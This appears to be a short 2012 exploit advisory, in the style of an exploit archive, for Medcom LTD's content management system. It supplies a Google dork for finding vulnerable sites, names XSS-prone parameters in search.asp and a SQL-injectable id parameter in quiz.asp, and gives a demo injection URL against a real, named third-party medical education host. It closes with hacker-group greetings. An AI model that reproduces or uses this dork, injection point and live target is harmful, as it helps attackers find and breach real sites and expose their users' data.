# Exploit Title:Medcom LTD cms sql Injction Vulnerability # # Google Dork: Intext:" Powered by Medcom LTD" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://medcom.com.hk # # Tested on: all # ================================== [+] Species & CommonName parametrs in search.asp are Vulnerable to xss [+] target/quiz.asp?id=[id][sqli] D3m0: http://cme.medcomasia.com/cmequiz/quiz.asp?id=4' ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369